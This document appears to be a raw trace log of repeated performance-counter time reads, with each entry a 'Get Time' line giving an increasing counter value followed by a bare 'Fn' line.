Get Time type = Performance Ctr, time = 13788062989 True 1
Fn
Get Time type = Performance Ctr, time = 13789130446 True 1
Fn
Get Time type = Performance Ctr, time = 13789317429 True 1
Fn
Get Time type = Performance Ctr, time = 13789985684 True 1
Fn
Get Time type = Performance Ctr, time = 13790093678 True 1
Fn
Get Time type = Performance Ctr, time = 13790664804 True 1
Fn
Get Time type = Performance Ctr, time = 13790793841 True 1
Fn
Get Time type = Performance Ctr, time = 13791411089 True 1
Fn
Get Time type = Performance Ctr, time = 13791694293 True 1
Fn
Get Time type = Performance Ctr, time = 13792577998 True 1
Fn
Get Time type = Performance Ctr, time = 13792707210 True 1
Fn
Get Time type = Performance Ctr, time = 13793265753 True 1
Fn
Get Time type = Performance Ctr, time = 13793531653 True 1
Fn
Get Time type = Performance Ctr, time = 13794265887 True 1
Fn
Get Time type = Performance Ctr, time = 13794388633 True 1
Fn
Get Time type = Performance Ctr, time = 13794955013 True 1
Fn
Get Time type = Performance Ctr, time = 13795324556 True 1
Fn
Get Time type = Performance Ctr, time = 13796322821 True 1
Fn
Get Time type = Performance Ctr, time = 13796434773 True 1
Fn
Get Time type = Performance Ctr, time = 13796978914 True 1
Fn
Get Time type = Performance Ctr, time = 13797102051 True 1
Fn
Get Time type = Performance Ctr, time = 13798559200 True 1
Fn
Get Time type = Performance Ctr, time = 13798698737 True 1
Fn
Get Time type = Performance Ctr, time = 13799413160 True 1
Fn
Get Time type = Performance Ctr, time = 13799572266 True 1
Fn
Get Time type = Performance Ctr, time = 13800215725 True 1
Fn
Get Time type = Performance Ctr, time = 13800337017 True 1
Fn
Get Time type = Performance Ctr, time = 13800871161 True 1
Fn
Get Time type = Performance Ctr, time = 13800981936 True 1
Fn
Get Time type = Performance Ctr, time = 13801544686 True 1
Fn
Get Time type = Performance Ctr, time = 13801654599 True 1
Fn
Get Time type = Performance Ctr, time = 13802731097 True 1
Fn
Get Time type = Performance Ctr, time = 13804342772 True 1
Fn
Get Time type = Performance Ctr, time = 13806867241 True 1
Fn
Get Time type = Performance Ctr, time = 13806991190 True 1
Fn
Get Time type = Performance Ctr, time = 13807709559 True 1
Fn
Get Time type = Performance Ctr, time = 13807826608 True 1
Fn
Get Time type = Performance Ctr, time = 13808375071 True 1
Fn
Get Time type = Performance Ctr, time = 13808489613 True 1
Fn
Get Time type = Performance Ctr, time = 13811103215 True 1
Fn
Get Time type = Performance Ctr, time = 13814198727 True 1
Fn
Get Time type = Performance Ctr, time = 13824712393 True 1
Fn
Get Time type = Performance Ctr, time = 13825463065 True 1
Fn
Get Time type = Performance Ctr, time = 13839449528 True 1
Fn
Get Time type = Performance Ctr, time = 13839665023 True 1
Fn
Get Time type = Performance Ctr, time = 13840291067 True 1
Fn
Get Time type = Performance Ctr, time = 13840582475 True 1
Fn
Get Time type = Performance Ctr, time = 13842506110 True 1
Fn
Get Time type = Performance Ctr, time = 13842768945 True 1
Fn
Get Time type = Performance Ctr, time = 13843630438 True 1
Fn
Get Time type = Performance Ctr, time = 13843833180 True 1
Fn
Get Time type = Performance Ctr, time = 13844406058 True 1
Fn
Get Time type = Performance Ctr, time = 13844586574 True 1
Fn
Get Time type = Performance Ctr, time = 13845085511 True 1
Fn
Get Time type = Performance Ctr, time = 13845286494 True 1
Fn
Get Time type = Performance Ctr, time = 13856346761 True 1
Fn
Get Time type = Performance Ctr, time = 13856529525 True 1
Fn
Get Time type = Performance Ctr, time = 13857098276 True 1
Fn
Get Time type = Performance Ctr, time = 13857379470 True 1
Fn
Get Time type = Performance Ctr, time = 13857999820 True 1
Fn
Get Time type = Performance Ctr, time = 13858141563 True 1
Fn
Get Time type = Performance Ctr, time = 13858577398 True 1
Fn
Get Time type = Performance Ctr, time = 13858755743 True 1
Fn
Get Time type = Performance Ctr, time = 13859226600 True 1
Fn
Get Time type = Performance Ctr, time = 13859335309 True 1
Fn
Get Time type = Performance Ctr, time = 13860841730 True 1
Fn
Get Time type = Performance Ctr, time = 13861018355 True 1
Fn
Get Time type = Performance Ctr, time = 13861539105 True 1
Fn
Get Time type = Performance Ctr, time = 13861714718 True 1
Fn
Get Time type = Performance Ctr, time = 13862425157 True 1
Fn
Get Time type = Performance Ctr, time = 13862558046 True 1
Fn
Get Time type = Performance Ctr, time = 13863076167 True 1
Fn
Get Time type = Performance Ctr, time = 13863151220 True 1
Fn
Get Time type = Performance Ctr, time = 13866917879 True 1
Fn
Get Time type = Performance Ctr, time = 13867011520 True 1
Fn
Get Time type = Performance Ctr, time = 13867413214 True 1
Fn
Get Time type = Performance Ctr, time = 13867631826 True 1
Fn
Get Time type = Performance Ctr, time = 13869131202 True 1
Fn
Get Time type = Performance Ctr, time = 13869360533 True 1
Fn
Get Time type = Performance Ctr, time = 13870271643 True 1
Fn
Get Time type = Performance Ctr, time = 13870470618 True 1
Fn
Get Time type = Performance Ctr, time = 13871138981 True 1
Fn
Get Time type = Performance Ctr, time = 13871377617 True 1
Fn
Get Time type = Performance Ctr, time = 13873160205 True 1
Fn
Get Time type = Performance Ctr, time = 13873391602 True 1
Fn
Get Time type = Performance Ctr, time = 13873976703 True 1
Fn
Get Time type = Performance Ctr, time = 13874162463 True 1
Fn
Get Time type = Performance Ctr, time = 13874666420 True 1
Fn
Get Time type = Performance Ctr, time = 13874885838 True 1
Fn
Get Time type = Performance Ctr, time = 13876640110 True 1
Fn
Get Time type = Performance Ctr, time = 13876870249 True 1
Fn
Get Time type = Performance Ctr, time = 13877516340 True 1
Fn
Get Time type = Performance Ctr, time = 13877663153 True 1
Fn
Get Time type = Performance Ctr, time = 13878181211 True 1
Fn
Get Time type = Performance Ctr, time = 13878374075 True 1
Fn
Get Time type = Performance Ctr, time = 13878957244 True 1
Fn
Get Time type = Performance Ctr, time = 13879149167 True 1
Fn
Get Time type = Performance Ctr, time = 13879679091 True 1
Fn
Get Time type = Performance Ctr, time = 13879887830 True 1
Fn
Get Time type = Performance Ctr, time = 13901657419 True 1
Fn
Get Time type = Performance Ctr, time = 13901807714 True 1
Fn
Get Time type = Performance Ctr, time = 13902409467 True 1
Fn
Get Time type = Performance Ctr, time = 13902526336 True 1
Fn
Get Time type = Performance Ctr, time = 13903627009 True 1
Fn
Get Time type = Performance Ctr, time = 13903746677 True 1
Fn
Get Time type = Performance Ctr, time = 13906254441 True 1
Fn
Get Time type = Performance Ctr, time = 13906373450 True 1
Fn
Get Time type = Performance Ctr, time = 13918353500 True 1
Fn
Get Time type = Performance Ctr, time = 13918489076 True 1
Fn
Get Time type = Performance Ctr, time = 13919128996 True 1
Fn
Get Time type = Performance Ctr, time = 13919264081 True 1
Fn
Get Time type = Performance Ctr, time = 13919925996 True 1
Fn
Get Time type = Performance Ctr, time = 13920097400 True 1
Fn
Get Time type = Performance Ctr, time = 13920907726 True 1
Fn
Get Time type = Performance Ctr, time = 13920976688 True 1
Fn
Get Time type = Performance Ctr, time = 13921561264 True 1
Fn
Get Time type = Performance Ctr, time = 13921675149 True 1
Fn
Get Time type = Performance Ctr, time = 13922346851 True 1
Fn
Get Time type = Performance Ctr, time = 13922468236 True 1
Fn
Get Time type = Performance Ctr, time = 13923118350 True 1
Fn
Get Time type = Performance Ctr, time = 13923234350 True 1
Fn
Get Time type = Performance Ctr, time = 13924677257 True 1
Fn
Get Time type = Performance Ctr, time = 13924753465 True 1
Fn
Get Time type = Performance Ctr, time = 13925286345 True 1
Fn
Get Time type = Performance Ctr, time = 13925403336 True 1
Fn
Get Time type = Performance Ctr, time = 13925921111 True 1
Fn
Get Time type = Performance Ctr, time = 13926058071 True 1
Fn
Get Time type = Performance Ctr, time = 13926594453 True 1
Fn
Get Time type = Performance Ctr, time = 13926706944 True 1
Fn
Get Time type = Performance Ctr, time = 13927430040 True 1
Fn
Get Time type = Performance Ctr, time = 13927555988 True 1
Fn
Get Time type = Performance Ctr, time = 13928160489 True 1
Fn
Get Time type = Performance Ctr, time = 13928272667 True 1
Fn
Get Time type = Performance Ctr, time = 13928968327 True 1
Fn
Get Time type = Performance Ctr, time = 13929100299 True 1
Fn
Get Time type = Performance Ctr, time = 13929626555 True 1
Fn
Get Time type = Performance Ctr, time = 13929848904 True 1
Fn
Get Time type = Performance Ctr, time = 13930582895 True 1
Fn
Get Time type = Performance Ctr, time = 13930700834 True 1
Fn
Get Time type = Performance Ctr, time = 13931193114 True 1
Fn
Get Time type = Performance Ctr, time = 13931307493 True 1
Fn
Get Time type = Performance Ctr, time = 13931878167 True 1
Fn
Get Time type = Performance Ctr, time = 13932042536 True 1
Fn
Get Time type = Performance Ctr, time = 13932550286 True 1
Fn
Get Time type = Performance Ctr, time = 13932665067 True 1
Fn
Get Time type = Performance Ctr, time = 13933376246 True 1
Fn
Get Time type = Performance Ctr, time = 13933515524 True 1
Fn
Get Time type = Performance Ctr, time = 13934232869 True 1
Fn
Get Time type = Performance Ctr, time = 13934372766 True 1
Fn
Get Time type = Performance Ctr, time = 13934962330 True 1
Fn
Get Time type = Performance Ctr, time = 13935075467 True 1
Fn
Get Time type = Performance Ctr, time = 13935829711 True 1
Fn
Get Time type = Performance Ctr, time = 13935956288 True 1
Fn
Get Time type = Performance Ctr, time = 13936505597 True 1
Fn
Get Time type = Performance Ctr, time = 13936638961 True 1
Fn
Get Time type = Performance Ctr, time = 13937306208 True 1
Fn
Get Time type = Performance Ctr, time = 13937425661 True 1
Fn
Get Time type = Performance Ctr, time = 13938053000 True 1
Fn
Get Time type = Performance Ctr, time = 13938169901 True 1
Fn
Get Time type = Performance Ctr, time = 13939215178 True 1
Fn
Get Time type = Performance Ctr, time = 13939334599 True 1
Fn
Get Time type = Performance Ctr, time = 13939852580 True 1
Fn
Get Time type = Performance Ctr, time = 13939987245 True 1
Fn
Get Time type = Performance Ctr, time = 13940541069 True 1
Fn
Get Time type = Performance Ctr, time = 13940685324 True 1
Fn
Get Time type = Performance Ctr, time = 13941443234 True 1
Fn
Get Time type = Performance Ctr, time = 13941565342 True 1
Fn
Get Time type = Performance Ctr, time = 13943659144 True 1
Fn
Get Time type = Performance Ctr, time = 13943935848 True 1
Fn
Get Time type = Performance Ctr, time = 13944781303 True 1
Fn
Get Time type = Performance Ctr, time = 13945036667 True 1
Fn
Get Time type = Performance Ctr, time = 13945863429 True 1
Fn
Get Time type = Performance Ctr, time = 13946122556 True 1
Fn
Get Time type = Performance Ctr, time = 13946742516 True 1
Fn
Get Time type = Performance Ctr, time = 13946943644 True 1
Fn
Get Time type = Performance Ctr, time = 13947493592 True 1
Fn
Get Time type = Performance Ctr, time = 13947808338 True 1
Fn
Get Time type = Performance Ctr, time = 13948432493 True 1
Fn
Get Time type = Performance Ctr, time = 13948539458 True 1
Fn
Get Time type = Performance Ctr, time = 13948971862 True 1
Fn
Get Time type = Performance Ctr, time = 13949395833 True 1
Fn
Get Time type = Performance Ctr, time = 13950028711 True 1
Fn
Get Time type = Performance Ctr, time = 13950168498 True 1
Fn
Get Time type = Performance Ctr, time = 13950694017 True 1
Fn
Get Time type = Performance Ctr, time = 13950861543 True 1
Fn
Get Time type = Performance Ctr, time = 13951336211 True 1
Fn
Get Time type = Performance Ctr, time = 13951558995 True 1
Fn
Get Time type = Performance Ctr, time = 13952346702 True 1
Fn
Get Time type = Performance Ctr, time = 13952622481 True 1
Fn
Get Time type = Performance Ctr, time = 13953219780 True 1
Fn
Get Time type = Performance Ctr, time = 13953475063 True 1
Fn
Get Time type = Performance Ctr, time = 13954352509 True 1
Fn
Get Time type = Performance Ctr, time = 13954554296 True 1
Fn
Get Time type = Performance Ctr, time = 13955051874 True 1
Fn
Get Time type = Performance Ctr, time = 13955325813 True 1
Fn
Get Time type = Performance Ctr, time = 13956153522 True 1
Fn
Get Time type = Performance Ctr, time = 13956433185 True 1
Fn
Get Time type = Performance Ctr, time = 13957090126 True 1
Fn
Get Time type = Performance Ctr, time = 13957249217 True 1
Fn
Get Time type = Performance Ctr, time = 13957726194 True 1
Fn
Get Time type = Performance Ctr, time = 13957831409 True 1
Fn
Get Time type = Performance Ctr, time = 13958383105 True 1
Fn
Get Time type = Performance Ctr, time = 13958489404 True 1
Fn
Get Time type = Performance Ctr, time = 13958937572 True 1
Fn
Get Time type = Performance Ctr, time = 13959072530 True 1
Fn
Get Time type = Performance Ctr, time = 13959543440 True 1
Fn
Get Time type = Performance Ctr, time = 13959699041 True 1
Fn
Get Time type = Performance Ctr, time = 13960196298 True 1
Fn
Get Time type = Performance Ctr, time = 13960358857 True 1
Fn
Get Time type = Performance Ctr, time = 13960812893 True 1
Fn
Get Time type = Performance Ctr, time = 13961051814 True 1
Fn
Get Time type = Performance Ctr, time = 13961627809 True 1
Fn
Get Time type = Performance Ctr, time = 13961767373 True 1
Fn
Get Time type = Performance Ctr, time = 13962510602 True 1
Fn
Get Time type = Performance Ctr, time = 13962772274 True 1
Fn
Get Time type = Performance Ctr, time = 13968171037 True 1
Fn
Get Time type = Performance Ctr, time = 13968365559 True 1
Fn
Get Time type = Performance Ctr, time = 13968922384 True 1
Fn
Get Time type = Performance Ctr, time = 13969021190 True 1
Fn
Get Time type = Performance Ctr, time = 13969490287 True 1
Fn
Get Time type = Performance Ctr, time = 13969733875 True 1
Fn
Get Time type = Performance Ctr, time = 13970365245 True 1
Fn
Get Time type = Performance Ctr, time = 13970602685 True 1
Fn
Get Time type = Performance Ctr, time = 13971274259 True 1
Fn
Get Time type = Performance Ctr, time = 13971470174 True 1
Fn
Get Time type = Performance Ctr, time = 13972059566 True 1
Fn
Get Time type = Performance Ctr, time = 13972350775 True 1
Fn
Get Time type = Performance Ctr, time = 13973075548 True 1
Fn
Get Time type = Performance Ctr, time = 13973228842 True 1
Fn
Get Time type = Performance Ctr, time = 13973959075 True 1
Fn
Get Time type = Performance Ctr, time = 13974188327 True 1
Fn
Get Time type = Performance Ctr, time = 13974925631 True 1
Fn
Get Time type = Performance Ctr, time = 13975051620 True 1
Fn
Get Time type = Performance Ctr, time = 13975552506 True 1
Fn
Get Time type = Performance Ctr, time = 13975833584 True 1
Fn
Get Time type = Performance Ctr, time = 13976452519 True 1
Fn
Get Time type = Performance Ctr, time = 13976756198 True 1
Fn
Get Time type = Performance Ctr, time = 13977520754 True 1
Fn
Get Time type = Performance Ctr, time = 13977830172 True 1
Fn
Get Time type = Performance Ctr, time = 13978528731 True 1
Fn
Get Time type = Performance Ctr, time = 13978772912 True 1
Fn
Get Time type = Performance Ctr, time = 13979573870 True 1
Fn
Get Time type = Performance Ctr, time = 13979808981 True 1
Fn
Get Time type = Performance Ctr, time = 13985328792 True 1
Fn
Get Time type = Performance Ctr, time = 13985505084 True 1
Fn
Get Time type = Performance Ctr, time = 13986350254 True 1
Fn
Get Time type = Performance Ctr, time = 13986483161 True 1
Fn
Get Time type = Performance Ctr, time = 13986948212 True 1
Fn
Get Time type = Performance Ctr, time = 13987064986 True 1
Fn
Get Time type = Performance Ctr, time = 13987527537 True 1
Fn
Get Time type = Performance Ctr, time = 13987736521 True 1
Fn
Get Time type = Performance Ctr, time = 13988575536 True 1
Fn
Get Time type = Performance Ctr, time = 13989867272 True 1
Fn
Get Time type = Performance Ctr, time = 14005372885 True 1
Fn
Get Time type = Performance Ctr, time = 14005638390 True 1
Fn
Get Time type = Performance Ctr, time = 14006244558 True 1
Fn
Get Time type = Performance Ctr, time = 14006469508 True 1
Fn
Get Time type = Performance Ctr, time = 14009275742 True 1
Fn
Get Time type = Performance Ctr, time = 14009528123 True 1
Fn
Get Time type = Performance Ctr, time = 14011151445 True 1
Fn
Get Time type = Performance Ctr, time = 14011413234 True 1
Fn
Get Time type = Performance Ctr, time = 14012133258 True 1
Fn
Get Time type = Performance Ctr, time = 14012308231 True 1
Fn
Get Time type = Performance Ctr, time = 14012831577 True 1
Fn
Get Time type = Performance Ctr, time = 14012995408 True 1
Fn
Get Time type = Performance Ctr, time = 14016636316 True 1
Fn
Get Time type = Performance Ctr, time = 14016867073 True 1
Fn
Get Time type = Performance Ctr, time = 14018028576 True 1
Fn
Get Time type = Performance Ctr, time = 14018217372 True 1
Fn
Get Time type = Performance Ctr, time = 14018778831 True 1
Fn
Get Time type = Performance Ctr, time = 14018952223 True 1
Fn
Get Time type = Performance Ctr, time = 14019622189 True 1
Fn
Get Time type = Performance Ctr, time = 14019814305 True 1
Fn
Get Time type = Performance Ctr, time = 14020421822 True 1
Fn
Get Time type = Performance Ctr, time = 14020590087 True 1
Fn
Get Time type = Performance Ctr, time = 14024841839 True 1
Fn
Get Time type = Performance Ctr, time = 14025104276 True 1
Fn
Get Time type = Performance Ctr, time = 14025822683 True 1
Fn
Get Time type = Performance Ctr, time = 14026062795 True 1
Fn
Get Time type = Performance Ctr, time = 14026701691 True 1
Fn
Get Time type = Performance Ctr, time = 14026838319 True 1
Fn
Get Time type = Performance Ctr, time = 14028977178 True 1
Fn
Get Time type = Performance Ctr, time = 14029788959 True 1
Fn
Get Time type = Performance Ctr, time = 14051337124 True 1
Fn
Get Time type = Performance Ctr, time = 14051576090 True 1
Fn
Get Time type = Performance Ctr, time = 14056877234 True 1
Fn
Get Time type = Performance Ctr, time = 14072757350 True 1
Fn
Get Time type = Performance Ctr, time = 14072839707 True 1
Fn
Get Time type = Performance Ctr, time = 14073413734 True 1
Fn
Get Time type = Performance Ctr, time = 14073551973 True 1
Fn
Get Time type = Performance Ctr, time = 14074044107 True 1
Fn
Get Time type = Performance Ctr, time = 14074127706 True 1
Fn
Get Time type = Performance Ctr, time = 14075621246 True 1
Fn
Get Time type = Performance Ctr, time = 14075807249 True 1
Fn
Get Time type = Performance Ctr, time = 14077561356 True 1
Fn
Get Time type = Performance Ctr, time = 14077733418 True 1
Fn
Get Time type = Performance Ctr, time = 14078458446 True 1
Fn
Get Time type = Performance Ctr, time = 14078653537 True 1
Fn
Get Time type = Performance Ctr, time = 14079412620 True 1
Fn
Get Time type = Performance Ctr, time = 14079699622 True 1
Fn
Get Time type = Performance Ctr, time = 14080378419 True 1
Fn
Get Time type = Performance Ctr, time = 14086454919 True 1
Fn
Get Time type = Performance Ctr, time = 14087169671 True 1
Fn
Get Time type = Performance Ctr, time = 14087283857 True 1
Fn
Get Time type = Performance Ctr, time = 14089127698 True 1
Fn
Get Time type = Performance Ctr, time = 14089278789 True 1
Fn
Get Time type = Performance Ctr, time = 14089831924 True 1
Fn
Get Time type = Performance Ctr, time = 14089970812 True 1
Fn
Get Time type = Performance Ctr, time = 14091843151 True 1
Fn
Get Time type = Performance Ctr, time = 14092054150 True 1
Fn
Get Time type = Performance Ctr, time = 14092666748 True 1
Fn
Get Time type = Performance Ctr, time = 14092740455 True 1
Fn
Get Time type = Performance Ctr, time = 14093248906 True 1
Fn
Get Time type = Performance Ctr, time = 14093552282 True 1
Fn
Get Time type = Performance Ctr, time = 14094426149 True 1
Fn
Get Time type = Performance Ctr, time = 14094885075 True 1
Fn
Get Time type = Performance Ctr, time = 14096533379 True 1
Fn
Get Time type = Performance Ctr, time = 14107118378 True 1
Fn
Get Time type = Performance Ctr, time = 14107226364 True 1
Fn
Get Time type = Performance Ctr, time = 14107728065 True 1
Fn
Get Time type = Performance Ctr, time = 14107937891 True 1
Fn
Get Time type = Performance Ctr, time = 14110216416 True 1
Fn
Get Time type = Performance Ctr, time = 14110359006 True 1
Fn
Get Time type = Performance Ctr, time = 14111532481 True 1
Fn
Get Time type = Performance Ctr, time = 14111657045 True 1
Fn
Get Time type = Performance Ctr, time = 14112399202 True 1
Fn
Get Time type = Performance Ctr, time = 14112662164 True 1
Fn
Get Time type = Performance Ctr, time = 14114301911 True 1
Fn
Get Time type = Performance Ctr, time = 14114580507 True 1
Fn
Get Time type = Performance Ctr, time = 14115316908 True 1
Fn
Get Time type = Performance Ctr, time = 14115504275 True 1
Fn
Get Time type = Performance Ctr, time = 14116042019 True 1
Fn
Get Time type = Performance Ctr, time = 14116221464 True 1
Fn
Get Time type = Performance Ctr, time = 14116951015 True 1
Fn
Get Time type = Performance Ctr, time = 14117122909 True 1
Fn
Get Time type = Performance Ctr, time = 14117786060 True 1
Fn
Get Time type = Performance Ctr, time = 14117858991 True 1
Fn
Get Time type = Performance Ctr, time = 14125707381 True 1
Fn
Get Time type = Performance Ctr, time = 14125971971 True 1
Fn
Get Time type = Performance Ctr, time = 14126654779 True 1
Fn
Get Time type = Performance Ctr, time = 14126746477 True 1
Fn
Get Time type = Performance Ctr, time = 14127358104 True 1
Fn
Get Time type = Performance Ctr, time = 14127466735 True 1
Fn
Get Time type = Performance Ctr, time = 14128801725 True 1
Fn
Get Time type = Performance Ctr, time = 14128892268 True 1
Fn
Get Time type = Performance Ctr, time = 14129362351 True 1
Fn
Get Time type = Performance Ctr, time = 14129573125 True 1
Fn
Get Time type = Performance Ctr, time = 14130089534 True 1
Fn
Get Time type = Performance Ctr, time = 14130273125 True 1
Fn
Get Time type = Performance Ctr, time = 14130778601 True 1
Fn
Get Time type = Performance Ctr, time = 14131026085 True 1
Fn
Get Time type = Performance Ctr, time = 14133577469 True 1
Fn
Get Time type = Performance Ctr, time = 14133819981 True 1
Fn
Get Time type = Performance Ctr, time = 14134341494 True 1
Fn
Get Time type = Performance Ctr, time = 14135172922 True 1
Fn
Get Time type = Performance Ctr, time = 14137359412 True 1
Fn
Get Time type = Performance Ctr, time = 14137797088 True 1
Fn
Get Time type = Performance Ctr, time = 14138333236 True 1
Fn
Get Time type = Performance Ctr, time = 14139088823 True 1
Fn
Get Time type = Performance Ctr, time = 14139865038 True 1
Fn
Get Time type = Performance Ctr, time = 14140305571 True 1
Fn
Get Time type = Performance Ctr, time = 14140883000 True 1
Fn
Get Time type = Performance Ctr, time = 14141203409 True 1
Fn
Get Time type = Performance Ctr, time = 14141973013 True 1
Fn
Get Time type = Performance Ctr, time = 14142304296 True 1
Fn
Get Time type = Performance Ctr, time = 14142810962 True 1
Fn
Get Time type = Performance Ctr, time = 14143542805 True 1
Fn
Get Time type = Performance Ctr, time = 14144184113 True 1
Fn
Get Time type = Performance Ctr, time = 14144463697 True 1
Fn
Get Time type = Performance Ctr, time = 14145011123 True 1
Fn
Get Time type = Performance Ctr, time = 14145295436 True 1
Fn
Get Time type = Performance Ctr, time = 14146311274 True 1
Fn
Get Time type = Performance Ctr, time = 14146717357 True 1
Fn
Get Time type = Performance Ctr, time = 14147162140 True 1
Fn
Get Time type = Performance Ctr, time = 14147488584 True 1
Fn
Get Time type = Performance Ctr, time = 14148040053 True 1
Fn
Get Time type = Performance Ctr, time = 14148322767 True 1
Fn
Get Time type = Performance Ctr, time = 14148934026 True 1
Fn
Get Time type = Performance Ctr, time = 14149266467 True 1
Fn
Get Time type = Performance Ctr, time = 14149754895 True 1
Fn
Get Time type = Performance Ctr, time = 14150098741 True 1
Fn
Get Time type = Performance Ctr, time = 14150528855 True 1
Fn
Get Time type = Performance Ctr, time = 14150880800 True 1
Fn
Get Time type = Performance Ctr, time = 14151398620 True 1
Fn
Get Time type = Performance Ctr, time = 14153612820 True 1
Fn
Get Time type = Performance Ctr, time = 14154923893 True 1
Fn
Get Time type = Performance Ctr, time = 14155269387 True 1
Fn
Get Time type = Performance Ctr, time = 14156010677 True 1
Fn
Get Time type = Performance Ctr, time = 14156373679 True 1
Fn
Get Time type = Performance Ctr, time = 14156880679 True 1
Fn
Get Time type = Performance Ctr, time = 14157216143 True 1
Fn
Get Time type = Performance Ctr, time = 14157740218 True 1
Fn
Get Time type = Performance Ctr, time = 14158436803 True 1
Fn
Get Time type = Performance Ctr, time = 14159155736 True 1
Fn
Get Time type = Performance Ctr, time = 14160767295 True 1
Fn
Get Time type = Performance Ctr, time = 14162344298 True 1
Fn
Get Time type = Performance Ctr, time = 14162700380 True 1
Fn
Get Time type = Performance Ctr, time = 14163214039 True 1
Fn
Get Time type = Performance Ctr, time = 14163583339 True 1
Fn
Get Time type = Performance Ctr, time = 14164099422 True 1
Fn
Get Time type = Performance Ctr, time = 14164430559 True 1
Fn
Get Time type = Performance Ctr, time = 14167702097 True 1
Fn
Get Time type = Performance Ctr, time = 14168037991 True 1
Fn
Get Time type = Performance Ctr, time = 14168664083 True 1
Fn
Get Time type = Performance Ctr, time = 14169031491 True 1
Fn
Get Time type = Performance Ctr, time = 14169656555 True 1
Fn
Get Time type = Performance Ctr, time = 14170007891 True 1
Fn
Get Time type = Performance Ctr, time = 14170529289 True 1
Fn
Get Time type = Performance Ctr, time = 14170872917 True 1
Fn
Get Time type = Performance Ctr, time = 14171426409 True 1
Fn
Get Time type = Performance Ctr, time = 14171805254 True 1
Fn
Get Time type = Performance Ctr, time = 14172326354 True 1
Fn
Get Time type = Performance Ctr, time = 14173301337 True 1
Fn
Get Time type = Performance Ctr, time = 14174023381 True 1
Fn
Get Time type = Performance Ctr, time = 14174393210 True 1
Fn
Get Time type = Performance Ctr, time = 14175004591 True 1
Fn
Get Time type = Performance Ctr, time = 14175337086 True 1
Fn
Get Time type = Performance Ctr, time = 14175877061 True 1
Fn
Get Time type = Performance Ctr, time = 14176257549 True 1
Fn
Get Time type = Performance Ctr, time = 14176854793 True 1
Fn
Get Time type = Performance Ctr, time = 14177375310 True 1
Fn
Get Time type = Performance Ctr, time = 14177914014 True 1
Fn
Get Time type = Performance Ctr, time = 14178692043 True 1
Fn
Get Time type = Performance Ctr, time = 14179400545 True 1
Fn
Get Time type = Performance Ctr, time = 14179760483 True 1
Fn
Get Time type = Performance Ctr, time = 14180352268 True 1
Fn
Get Time type = Performance Ctr, time = 14181213460 True 1
Fn
Get Time type = Performance Ctr, time = 14181974019 True 1
Fn
Get Time type = Performance Ctr, time = 14182594478 True 1
Fn
Get Time type = Performance Ctr, time = 14183170830 True 1
Fn
Get Time type = Performance Ctr, time = 14183719957 True 1
Fn
Get Time type = Performance Ctr, time = 14184254297 True 1
Fn
Get Time type = Performance Ctr, time = 14184808914 True 1
Fn
Get Time type = Performance Ctr, time = 14188069413 True 1
Fn
Get Time type = Performance Ctr, time = 14188469657 True 1
Fn
Get Time type = Performance Ctr, time = 14189074676 True 1
Fn
Get Time type = Performance Ctr, time = 14189496408 True 1
Fn
Get Time type = Performance Ctr, time = 14189993493 True 1
Fn
Get Time type = Performance Ctr, time = 14190110608 True 1
Fn
Get Time type = Performance Ctr, time = 14190570978 True 1
Fn
Get Time type = Performance Ctr, time = 14190713695 True 1
Fn
Get Time type = Performance Ctr, time = 14191160647 True 1
Fn
Get Time type = Performance Ctr, time = 14191270641 True 1
Fn
Get Time type = Performance Ctr, time = 14200902290 True 1
Fn
Get Time type = Performance Ctr, time = 14201106118 True 1
Fn
Get Time type = Performance Ctr, time = 14201490205 True 1
Fn
Get Time type = Performance Ctr, time = 14201743435 True 1
Fn
Get Time type = Performance Ctr, time = 14202169296 True 1
Fn
Get Time type = Performance Ctr, time = 14202432836 True 1
Fn
Get Time type = Performance Ctr, time = 14203235921 True 1
Fn
Get Time type = Performance Ctr, time = 14203414439 True 1
Fn
Get Time type = Performance Ctr, time = 14203784361 True 1
Fn
Get Time type = Performance Ctr, time = 14203896697 True 1
Fn
Get Time type = Performance Ctr, time = 14204245665 True 1
Fn
Get Time type = Performance Ctr, time = 14204381058 True 1
Fn
Get Time type = Performance Ctr, time = 14205637302 True 1
Fn
Get Time type = Performance Ctr, time = 14205742290 True 1
Fn
Get Time type = Performance Ctr, time = 14206152647 True 1
Fn
Get Time type = Performance Ctr, time = 14206395540 True 1
Fn
Get Time type = Performance Ctr, time = 14206815393 True 1
Fn
Get Time type = Performance Ctr, time = 14206920455 True 1
Fn
Get Time type = Performance Ctr, time = 14207331017 True 1
Fn
Get Time type = Performance Ctr, time = 14207562464 True 1
Fn
Get Time type = Performance Ctr, time = 14209177154 True 1
Fn
Get Time type = Performance Ctr, time = 14209431899 True 1
Fn
Get Time type = Performance Ctr, time = 14209854111 True 1
Fn
Get Time type = Performance Ctr, time = 14210112925 True 1
Fn
Get Time type = Performance Ctr, time = 14210536701 True 1
Fn
Get Time type = Performance Ctr, time = 14210689090 True 1
Fn
Get Time type = Performance Ctr, time = 14211057560 True 1
Fn
Get Time type = Performance Ctr, time = 14211354821 True 1
Fn
Get Time type = Performance Ctr, time = 14213018721 True 1
Fn
Get Time type = Performance Ctr, time = 14213230325 True 1
Fn
Get Time type = Performance Ctr, time = 14213588252 True 1
Fn
Get Time type = Performance Ctr, time = 14213694967 True 1
Fn
Get Time type = Performance Ctr, time = 14214015186 True 1
Fn
Get Time type = Performance Ctr, time = 14214120714 True 1
Fn
Get Time type = Performance Ctr, time = 14214452140 True 1
Fn
Get Time type = Performance Ctr, time = 14214683048 True 1
Fn
Get Time type = Performance Ctr, time = 14215919422 True 1
Fn
Get Time type = Performance Ctr, time = 14216055675 True 1
Fn
Get Time type = Performance Ctr, time = 14216469947 True 1
Fn
Get Time type = Performance Ctr, time = 14216608335 True 1
Fn
Get Time type = Performance Ctr, time = 14217193299 True 1
Fn
Get Time type = Performance Ctr, time = 14217324755 True 1
Fn
Get Time type = Performance Ctr, time = 14217874988 True 1
Fn
Get Time type = Performance Ctr, time = 14218134054 True 1
Fn
Get Time type = Performance Ctr, time = 14218673039 True 1
Fn
Get Time type = Performance Ctr, time = 14218942902 True 1
Fn
Get Time type = Performance Ctr, time = 14220238276 True 1
Fn
Get Time type = Performance Ctr, time = 14220319793 True 1
Fn
Get Time type = Performance Ctr, time = 14220649429 True 1
Fn
Get Time type = Performance Ctr, time = 14220795808 True 1
Fn
Get Time type = Performance Ctr, time = 14221142228 True 1
Fn
Get Time type = Performance Ctr, time = 14221354036 True 1
Fn
Get Time type = Performance Ctr, time = 14222810902 True 1
Fn
Get Time type = Performance Ctr, time = 14223012113 True 1
Fn
Get Time type = Performance Ctr, time = 14223407881 True 1
Fn
Get Time type = Performance Ctr, time = 14223657053 True 1
Fn
Get Time type = Performance Ctr, time = 14224050517 True 1
Fn
